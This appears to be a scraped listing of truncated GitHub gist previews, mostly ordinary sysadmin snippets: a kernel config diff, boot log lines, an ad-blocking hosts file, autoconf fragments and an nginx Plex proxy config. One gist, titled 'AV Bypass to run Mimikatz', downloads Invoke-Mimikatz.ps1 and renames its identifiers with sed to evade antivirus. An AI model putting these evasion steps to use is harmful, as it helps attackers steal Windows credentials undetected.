This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- x86_64-dotconfig-sorted 2018-05-19 18:10:51.004855152 +0000 | |
+++ config-4.15.0-20-generic-sorted 2018-05-19 18:10:40.030286041 +0000 | |
@@ -316,6 +316,69 @@ | |
+ | |
+ | |
+ | |
+ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Automatically generated file; DO NOT EDIT. | |
# Linux/x86 4.15.0-20-generic Kernel Configuration | |
# | |
CONFIG_64BIT=y | |
CONFIG_X86_64=y | |
CONFIG_X86=y | |
CONFIG_INSTRUCTION_DECODER=y | |
CONFIG_OUTPUT_FORMAT="elf64-x86-64" | |
CONFIG_ARCH_DEFCONFIG="arch/x86/configs/x86_64_defconfig" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ 0.000000] ACPI BIOS Warning (bug): Optional FADT field Pm2ControlBlock has va | |
lid Length but zero Address: 0x0000000000000000/0x1 (20180105/tbfadt-658) | |
[ 0.000000] ACPI: DSDT 0x00000000CCF331E0 014F1F (v02 HPQOEM 83C6 01072009 | |
ACPI 20120913) | |
[ 0.000000] ACPI: FACS 0x00000000CD3E3F80 000040 | |
[ 0.000000] ACPI: APIC 0x00000000CCF48218 0000DE (v03 HPQOEM 83C6 01072009 | |
HP 00010013) | |
[ 0.000000] ACPI: FPDT 0x00000000CCF482F8 000044 (v01 HPQOEM 83C6 01072009 | |
HP 00010013) | |
[ 0.000000] ACPI: FIDT 0x00000000CCF48340 00009C (v01 HPQOEM 83C6 01072009 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0.0.0.0 www3.l.google.com | |
0.0.0.0 ads.doubleclick.net | |
0.0.0.0 s.ytimg.com | |
0.0.0.0 ad.youtube.com | |
0.0.0.0 ads.youtube.com | |
0.0.0.0 www.gstatic.com | |
0.0.0.0 gstatic.com | |
0.0.0.0 clients1.google.com | |
0.0.0.0 dts.innovid.com | |
0.0.0.0 googleads.g.doubleclick.net |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
exec snooze -d 2/5 /usr/local/bin/update-adblock |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Check whether --with-yara was given. | |
if test "${with_yara+set}" = set; then : | |
withval=$with_yara; case "$withval" in | |
yes|no) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 | |
$as_echo "no" >&6; } | |
;; | |
*) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 | |
$as_echo "$withval" >&6; } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Check whether --with-glib2 was given. | |
if test "${with_glib2+set}" = set; then : | |
withval=$with_glib2; case "$withval" in | |
yes|no) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 | |
$as_echo "no" >&6; } | |
;; | |
*) | |
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 | |
$as_echo "$withval" >&6; } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# check if root | |
if [ $UID != 0 ]; then | |
echo "You need to be root to run this" | |
exit 0 | |
fi | |
tmpdir=/tmp/Adobe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Plex Server | |
upstream plex.domain.org { | |
server 127.0.0.1:32400; | |
keepalive 32; | |
} | |
server { | |
listen 443; |
OlderNewer